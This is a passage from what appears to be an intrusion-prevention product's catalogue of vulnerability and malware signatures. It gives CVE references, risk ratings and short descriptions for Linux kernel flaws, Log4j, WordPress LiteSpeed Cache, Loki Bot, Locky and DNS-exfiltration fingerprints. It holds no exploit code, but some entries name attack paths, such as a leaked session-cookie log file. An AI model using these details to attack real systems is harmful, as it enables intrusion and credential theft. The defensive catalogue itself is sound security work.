Improper input validation in messenger_V2.c causes a signedness vulnerability in the Linux kernel. A successful exploit allows an attacker to cause a denial of service condition or possibly execute code on the target system.

Situation:

Generic_SS-Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error

References:

CVE-2023-44466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44466

Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Netfilter Core Team iptables

Risk:

Moderate

First detected in:

sgpkg-ips-1178-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

Restoration of iptables rules with long arguments causes a stack-based buffer overflow in iptables. A successful exploit may allow an attacker to execute arbitrary code with the usually high privileges of the affected process.

Situation:

File-Text_Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow

References:

CVE-2019-11360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11360

Linux-Kernel-Netfilter-SCTP-Unknown-Chunk-Types-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the Linux Kernel.

Situation:

IPv4_SCTP-Unknown-Chunk-Type

References:

CVE-2007-2876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2876

BID-24376
http://www.securityfocus.com/bid/24376

Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass

About this vulnerability:

A vulnerability in Linux Kernel Project Linux

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There is a security bypass vulnerability in the Linux Kernel. The vulnerability is due to an insecure design in Linux kernel when handling the NFS request, MKNOD. By sending a crafted NFS MKNOD request to a target system, a remote attacker can leverage this vulnerability to create a device on a target system. Successful exploitation of this vulnerability can allow a remote attacker to create a device on a target system, allowing for further compromise on the vulnerable system.

Situation:

SunRPC_CS-Linux-Kernel-Nfsd-Cap_Mknod-Security-Bypass

References:

BID-34205
http://www.securityfocus.com/bid/34205

Linux-Kernel-Nfsd-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in the NFS component of the Linux kernel.

Risk:

High

First detected in:

sgpkg-ips-1555-5242

Last changed:

sgpkg-ips-1555-5242

Platform:

Linux

Software:

linux NFS utils

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability in the NFS component of the Linux kernel, Linux Kernel Project Kernel 6.0.x prior to 6.0.2 and prior to 5.19.17, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending crafted packets to a vulnerable system, due to missing bounds checks on the size of RPC records received.

Situation:

Generic_CS-Linux-Kernel-Nfsd-Heap-Buffer-Overflow

References:

CVE-2022-43945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43945

Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

There is a remote denial of service vulnerability in the Linux Kernel. The vulnerability is due to an implementation flaw which may result in a buffer overflow in the NFS subsystem of the Linux Kernel. By sending Access Control List (ACL) NFS requests to a target host, an attacker may exploit this vulnerability to cause kernel panic, leading to a system wide denial of service condition. Exploiting this vulnerability successfully will cause a kernel panic condition on the target system. The kernel will log a panic message on the system console containing debug information pertaining to the panic condition which includes the call trace, register values and so on. The target host must be restarted to resume its functionality.

Situation:

Generic_UDP-Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow

References:

CVE-2008-3915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3915

BID-31133
http://www.securityfocus.com/bid/31133

Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-990-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Input Validation

Description:

Improper handling of the pNFS LAYOUTGET and GETDEVICEINFO commands in the Linux kernel NFS server causes a denial of service vulnerability.

Situation:

SunRPC_CS-Linux-Kernel-Nfsv4-Nfsd-Pnfs-Denial-Of-Service

References:

CVE-2017-8797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8797

Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Red Hat Enterprise Linux

Software:

<os>

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in the SCTP networking module of the Linux kernel. The vulnerability is due to an error while processing crafted ASCONF chunks. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted SCTP packets to a vulnerable system. A successful exploitation will result in a system crash.

Situation:

IPv4_Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service
IPv6_Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service

References:

CVE-2014-3673
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3673

BID-70883
http://www.securityfocus.com/bid/70883

OSVDB-113727
http://www.osvdb.org/113727

Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Red Hat Enterprise Linux

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the SCTP networking module of the Linux kernel. The vulnerability is due to a NULL pointer dereference while processing malformed INIT chunks. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted SCTP packets to a vulnerable system. A successful attack will result in the denial of service condition.

Situation:

IPv4_Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference
IPv6_Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference

References:

CVE-2014-7841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7841

BID-71081
http://www.securityfocus.com/bid/71081

OSVDB-114575
http://www.osvdb.org/114575

Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the Linux Kernel.

Situation:

IPv4_Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service

References:

CVE-2006-2934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2934

BID-18755
http://www.securityfocus.com/bid/18755

Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the SCTP network module of the Linux Kernel.

Situation:

IPv4_Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service

References:

CVE-2013-2206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2206

BID-60715
http://www.securityfocus.com/bid/60715

OSVDB-94456
http://www.osvdb.org/94456

Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux Kernel Organization Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the SCTP module of Linux Kernel.

Situation:

IPv4_Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow

References:

CVE-2009-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0065

BID-33113
http://www.securityfocus.com/bid/33113

Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in the Linux Kernel.

Situation:

IPv4_Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference

References:

CVE-2014-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0101

BID-65943
http://www.securityfocus.com/bid/65943

OSVDB-104004
http://www.osvdb.org/104004

Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists an out-of-bounds read vulnerability in the SCTP networking module of the Linux kernel. A remote, unauthenticated attacker can use this to cause a denial of service condition.

Situation:

IPv4_Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read
IPv4_Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read-2

References:

CVE-2016-9555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9555

Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Integer Overflow

Description:

There exists an integer underflow vulnerability in the SCTP networking module of the Linux Kernel.

Situation:

IPv4_Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow
IPv6_Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow

References:

CVE-2014-4667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667

BID-68224
http://www.securityfocus.com/bid/68224

OSVDB-108473
http://www.osvdb.org/108473

Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow

About this vulnerability:

A vulnerability in Linux Kernel Organization Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a vulnerability in Linux Kernel. A remote attacker can use this to cause a memory overflow resulting in arbitrary code execution.

Situation:

IPv4_Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow

References:

CVE-2010-1173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173

BID-39794
http://www.securityfocus.com/bid/39794

Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Organization Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-755-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There exists a denial of service vulnerability in Linux kernel.

Situation:

IPv4_Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service
IPv6_Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service

References:

CVE-2010-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008

BID-38857
http://www.securityfocus.com/bid/38857

Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886

About this vulnerability:

A vulnerability in Linux Kernel

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

A use after free vulnerability has been reported in the TIPC module of the Linux Kernel. The vulnerability is due to improper handling of an error case when processing fragmented TIPC messages. A remote attacker can exploit the vulnerability by sending crafted packets to the vulnerable target. Successful exploitation of the vulnerability can result in a denial of service condition or, in the worst case, code execution in the context of the kernel.

Situation:

Generic_UDP-Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886

References:

CVE-2024-36886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36886

Linux-Kernel-TIPC-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in the TIPC module of the Linux Kernel.

Risk:

High

First detected in:

sgpkg-ips-1453-5242

Last changed:

sgpkg-ips-1453-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

A vulnerability in the TIPC module of the Linux Kernel, versions prior to 5.14.16, which allows remote attackers to execute arbitrary code by sending a crafted request to the vulnerable server, due to insufficient validation of user-supplied sizes for the MSG_CRYPTO message type.

Situation:

Generic_UDP-Linux-Kernel-TIPC-Heap-Buffer-Overflow

References:

CVE-2021-43267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43267

Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

High

First detected in:

sgpkg-ips-1503-5242

Last changed:

sgpkg-ips-1503-5242

Platform:

Generic

Software:

<os>

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in the TIPC module of the Linux Kernel. The vulnerability is due to insufficient validation of user-supplied sizes for monitoring framework messages. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. A successful attack can result in arbitrary code execution with kernel privileges.

Situation:

Generic_UDP-Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435

References:

CVE-2022-0435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435

Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service

About this vulnerability:

A vulnerability in Linux Kernel Project Kernel

Risk:

Moderate

First detected in:

sgpkg-ips-553-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Malfunction

Description:

There is a denial of service vulnerability in the Linux Kernel with UDP Fragmentation Offload (UFO) enabled. The vulnerability is due to improper handling of UDP packets over IPv6 with a size larger than MTU when the kernel is configured with the TBF qdisc. A remote attacker can exploit this vulnerability by sending a crafted packet to a vulnerable server. Successful exploitation can result in memory corruption which leads to a denial of service condition.

Situation:

TFTP_CS-Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service

References:

CVE-2013-4563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4563

BID-63702
http://www.securityfocus.com/bid/63702

OSVDB-99877
http://www.osvdb.org/99877

LinuxKI-Toolset-Remote-Code-Execution

About this vulnerability:

A vulnerability in LinuxKI Toolset

Risk:

High

First detected in:

sgpkg-ips-1354-5242

Last changed:

sgpkg-ips-1354-5242

Platform:

Linux; Unix

Software:

LinuxKI Toolset

Type:

Input Validation

Description:

There exists a vulnerability in LinuxKI Toolset, versions 6.01 and before, which allows remote attackers to execute arbitrary code, due to insufficient user input validation.

Situation:

HTTP_CSU-LinuxKI-Toolset-Remote-Code-Execution

References:

CVE-2020-7209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7209

Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Liquid XML Studio software

Risk:

Moderate

First detected in:

sgpkg-ips-297-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Liquid Technologies XML Studio

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Liquid XML Studio LtXmlComHelp8.dll ActiveX control. The vulnerability can be exploited by enticing a target user to open a maliciously crafted HTML document to execute arbitrary code on a target system.

Situation:

HTTP_SS-Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
File-Text_Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow

References:

OSVDB-63087
http://www.osvdb.org/63087

Listrec-Pl-Vulnerability

About this vulnerability:

Listrec.pl remote code execution and file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

listrec.pl

Type:

Input Validation

Description:

The listrec.pl from Textor Webmasters Ltd. contains an input validation flaw that may allow command execution and file disclosure.

References:

CVE-2001-0997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0997

BID-3328
http://www.securityfocus.com/bid/3328

LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000

About this vulnerability:

An attempt to exploit a vulnerability in WordPress detected

Risk:

High

First detected in:

sgpkg-ips-1776-5242

Last changed:

sgpkg-ips-1776-5242

Platform:

Generic

Software:

WordPress

Type:

Insecure Configuration

Description:

The debug logging feature of the WordPress' LiteSpeed Cache plugin versions before 6.5.0.1 logs all HTTP response headers into a file. The headers include the "Set-Cookie" header, which contains session cookies used to authenticate users. If an attacker can steal them, they can impersonate an admin user and take complete control of the site. The log file is available at "/wp-content/debug.log". Accessing the file is possible when no file access restriction has been implemented.

Situation:

HTTP_CSU-LiteSpeed-Cache-Unauthenticated-Account-Takeover-CVE-2024-44000

References:

CVE-2024-44000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44000

LiteSpeed-Web-Server-Source-Code-Disclosure

About this vulnerability:

A LiteSpeed Web Server Source Code Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LiteSpeed

Type:

Configuration Error

Description:

A vulnerability in LiteSpeed Web Server, versions 4.0.x before 4.0.15, which allows remote attackers to read source code of scripts via an HTTP request with a null byte followed by a .txt extension.

Situation:

HTTP_CSU-LiteSpeed-Web-Server-Source-Code-Disclosure

References:

CVE-2010-2333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333

BID-40815
http://www.securityfocus.com/bid/40815

OSVDB-65476
http://www.osvdb.org/65476

Livinston-Telnet-Reboot

About this vulnerability:

Livingston Portmaster Reboot DOS

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Other

Software:

Generic telnet server

Type:

Malfunction

Description:

Livingston Portmaster could be remotely rebooted without authorization.

Situation:

Telnet_CCS-Livingston-Reboot-DoS

References:

CVE-1999-0218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0218

LoadRunner-magentproc.exe-Stack-Buffer-Overflow

About this vulnerability:

A LoadRunner magentproc.exe Stack Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP LoadRunner

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in HP LoadRunner, versions 11.52 and before, which allows remote attackers to cause a denial of service condition or execute arbitrary code, due to the insufficient validation of a length value in SSL communication with magentproc.exe.

Situation:

Generic_CS-LoadRunner-magentproc.exe-Stack-Buffer-Overflow

References:

CVE-2013-4800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4800

Local-System-Access-Via-ActiveX-Controls

About this vulnerability:	ActiveX controls allow access to the local system
Risk:	High
First detected in:	sgpkg-ips-111-2032
Last changed:	sgpkg-ips-1779-5242
Platform:	Windows
Software:	Internet Explorer; Generic HTTP client
Type:	Malfunction
Description:	Microsoft Windows allows access to local resources via several different ActiveX controls. Normally these controls can be accessed only from programs that have been started from the local machine. By using other vulnerabilities, these controls may be used from code in a web page or email message, allowing arbitrary code execution or local resource access in the context of the currently logged in user.
Situation:	HTTP_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write HTTP_Shell.Application-ActiveX-Object-Local-File-Execute HTTP_WScript.Shell-ActiveX-Object-Local-File-Execute HTTP_WScript.Shell-ActiveX-Object-Local-Registry-Access File-Text_ShellExecute-ActiveX-Object-Batch-Script-Local-Execute File-Text_WScript.Shell-ActiveX-Object-Local-Registry-Access File-Text_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write File-Text_Shell.Application-ActiveX-Object-Local-File-Execute File-Text_WScript.Shell-ActiveX-Object-Local-File-Execute File-TextId_WScript.Shell-ActiveX-Object-Local-File-Execute

Locky-B-Control-Traffic

About this vulnerability:	HTTP traffic related to Locky Ransomware
Risk:	High
First detected in:	sgpkg-ips-784-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Locky is a ransomware spreading botnet.
Situation:	HTTP_CSH-Locky-B-Control-Traffic

Log4j-Denial-of-Service-CVE-2021-45105

About this vulnerability:

An attempt to exploit a vulnerability in Log4j detected

Risk:

High

First detected in:

sgpkg-ips-1420-5242

Last changed:

sgpkg-ips-1420-5242

Platform:

Generic

Software:

Apache Software Foundation Log4j

Type:

Infinite Loop

Description:

An uncontrolled recursion vulnerability has been reported in the StrSubstitutor class of Apache Log4j. This vulnerability is due to improper handling of logged messages when the logging configuration uses a non-default Pattern Layout with a Context Map Lookup, Map Lookup, or Structured Data Lookup. A remote attacker who can control an item in the Thread Context Map or a MapMessage or StructuredDataMessage can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation could result in a denial-of-service condition due to a crash of the Log4j service.

Situation:

HTTP_CS-Log4j-Denial-of-Service-CVE-2021-45105
HTTP_CRL-Log4j-Denial-of-Service-CVE-2021-45105

References:

CVE-2021-45105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105

Log4j-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Log4j detected

Risk:

Critical

First detected in:

sgpkg-ips-1413-5242

Last changed:

sgpkg-ips-1423-5242

Platform:

Generic

Software:

Apache Software Foundation Log4j

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Log4j detected.

Situation:

HTTP_CS_Log4j-Remote-Code-Execution
HTTP_CS_Log4j-Remote-Code-Execution-Environment-Variable-Leak
HTTP_CS_Log4j-Remote-Code-Execution-Evasion
HTTP_CRL-Log4j-Remote-Code-Execution
Generic_CS-Log4j-Remote-Code-Execution
File-PDF_Log4j-Remote-Code-Execution

References:

CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Logback-Remote-Code-Execution

About this vulnerability:	An attempt to exploit a vulnerability in Logback detected
Risk:	High
First detected in:	sgpkg-ips-1418-5242
Last changed:	sgpkg-ips-1418-5242
Platform:	Generic
Software:	Logback
Type:	Malfunction
Description:	An attempt to exploit a vulnerability in Logback detected.
Situation:	HTTP_CS-Logback-Remote-Code-Execution

Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Logitech VideoCall

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Logitech VideoCall

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Logitech VideoCall ActiveX control. The vulnerability is due to an error in a particular method exposed by the ActiveX control that suffers insufficient input validation. Exploitation may lead to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
File-Text_Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-2918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2918

BID-24254
http://www.securityfocus.com/bid/24254

OSVDB-36820
http://www.osvdb.org/36820

LogPOS-Malware

About this vulnerability:	LogPOS Malware
Risk:	High
First detected in:	sgpkg-ips-634-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Code Injection
Description:	LogPOS is a malware that steals credit card information and stores them in a mailslot.
Situation:	HTTP_CSU-LogPOS-Malware-Traffic-Detected

Logsign-Remote-Command-Injection

About this vulnerability:	A Logsign Remote Command Injectio vulnerability
Risk:	High
First detected in:	sgpkg-ips-1020-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Logsign
Type:	Input Validation
Description:	A vulnerability in Logsign, versions 4.4.2 and 4.4.137, which allows remote attackers to execute arbitrary code due to the lack of input validation.
Situation:	HTTP_CRL-Logsign-Remote-Command-Injection

Logsign-Unified-Secops-Authentication-Failure

About this vulnerability:

A failed Logsign Unified SecOps authentication attempt detected

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Generic

Software:

Logsign Unified SecOps

Type:

Brute Force

Description:

This detects failed authentication attempts for Logsign Unified SecOps. A large number of such attempts in a short period of time may indicate a 2FA brute force attack.

Situation:

File-Text_Logsign-Unified-Secops-Authentication-Failure

References:

CVE-2025-1044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1044

Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721

About this vulnerability:

A vulnerability in Logsign Unified SecOps

Risk:

Critical

First detected in:

sgpkg-ips-1768-5242

Last changed:

sgpkg-ips-1768-5242

Platform:

Generic

Software:

Logsign

Type:

Malfunction

Description:

An unauthenticated remote code execution vulnerability has been reported in the Logsign Unified SecOps Platform. The vulnerability is due to the lack of authentication in Logsign's cluster HTTP API. Successful exploitation results in the execution of arbitrary code in the context of root.

Situation:

File-Text_Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721

References:

CVE-2024-5721
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5721

LOIC-DoS-Tool

About this vulnerability:	LOIC DoS Tool
Risk:	High
First detected in:	sgpkg-ips-493-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Resource Starvation
Description:	Low Orbit Ion Cannon (LOIC) is a tool that can be used for network stress testing and denial of service attacks. Some LOIC versions have a feature that allows it to be remotely controlled via IRC. There are also a JavaScript version (called JS LOIC) and a web version (called Low Orbit Web Cannon) which enable participation in a DoS attack using a web browser. For example Anonyous has used LOIC and JS LOIC in its attacks.
Situation:	Analyzer_LOIC-HTTP-Denial-Of-Service HTTP_CRL-Possible-LOIC-Request HTTP_CRL-Suspected-LOIC-Request File-Text_JavaScript-LOIC-Download

Loki-Bot-C2-Traffic

About this vulnerability:	Loki Bot C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1091-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Loki Bot is a credential stealer malware. It's capable to steal passwords from several applications.
Situation:	HTTP_CS-Loki-Bot-C2-Traffic

Loki-RAT

About this vulnerability:	LOKI RAT
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	LOKI is a Remote Administration Tool (RAT) that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	HTTP_CSU-Loki-RAT-Traffic

Lolibotinc-Botnet

About this vulnerability:	Lolibotinc botnet
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Lolibotinc is a worm that infects Linux-based systems.
Situation:	Generic_CS-Lolibotinc-Linux-Infection-Traffic

Long-Basic-Authorization-Header

About this vulnerability:	A long authorization header with basic scheme
Risk:	Low
First detected in:	sgpkg-ips-500-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP server
Type:	Buffer Overflow
Description:	An long Authorization HTTP header with Basic scheme was detected. Basic authentication represents a non-encrypted base64-encoded string of username and password, likely indicating the use of lengthy passwords. However, this can also be used for buffer overflow attacks against vulnerable HTTP servers.
Situation:	HTTP_CSH-Long-Basic-Authorization-Header

Long-Domain-Name-Redirect

About this vulnerability:	HTTP redirect to unusually long domain name
Risk:	Low
First detected in:	sgpkg-ips-795-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Post Compromise Behaviour
Description:	Unusually long domain name redirects are sometimes common with legitimate Internet traffic, but often they reveal communication to automatically generated endpoints hosting malware.
Situation:	HTTP_SHS-Possibly-Malicious-Long-Domain-Name-Redirect

Long-Domain-Name-With-Mixed-Letters-And-Digits

About this vulnerability:	A DNS request containing a long domain name with mixed letters and digits detected
Risk:	High
First detected in:	sgpkg-ips-1658-5242
Last changed:	sgpkg-ips-1658-5242
Platform:	Generic
Software:	Any Software
Type:	Backdoor
Description:	This fingerprint detects DNS queries that contain long domain names with mixed letters and digits. One or few of such DNS queries may not be a compromise indicator. However, seeing many of them in a short amount of time may be a sign of data being exfiltrated via DNS.
Situation:	DNS-UDP_Long-Domain-Name-With-Mixed-Letters-And-Digits DNS-UDP_Suspicious-Long-Domain-Name-With-Mixed-Letters-And-Digits

Loop-Denial-Of-Service-CVE-2024-2169

About this vulnerability:

An attempt to exploit a vulnerability in UDP protocol detected

Risk:

High

First detected in:

sgpkg-ips-1708-5242

Last changed:

sgpkg-ips-1709-5242

Platform:

Generic

Software:

Any Software

Type:

Input Validation

Description:

In a loop denial-of-service attack, the attacker creates application-layer loops in which two network services keep responding to each others' messages. For example, imagine two services that respond with an error message when receiving an error message as input. If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely. Such loop behaviors have been discovered to exist in certain TFTP, DNS and NTP implementations.

Situation:

DNS-UDP_DNS-Error-Response-With-Same-Source-And-Destination-Ports
TFTP_CS-TFTP-Error-Response-With-Same-Source-And-Destination-Ports
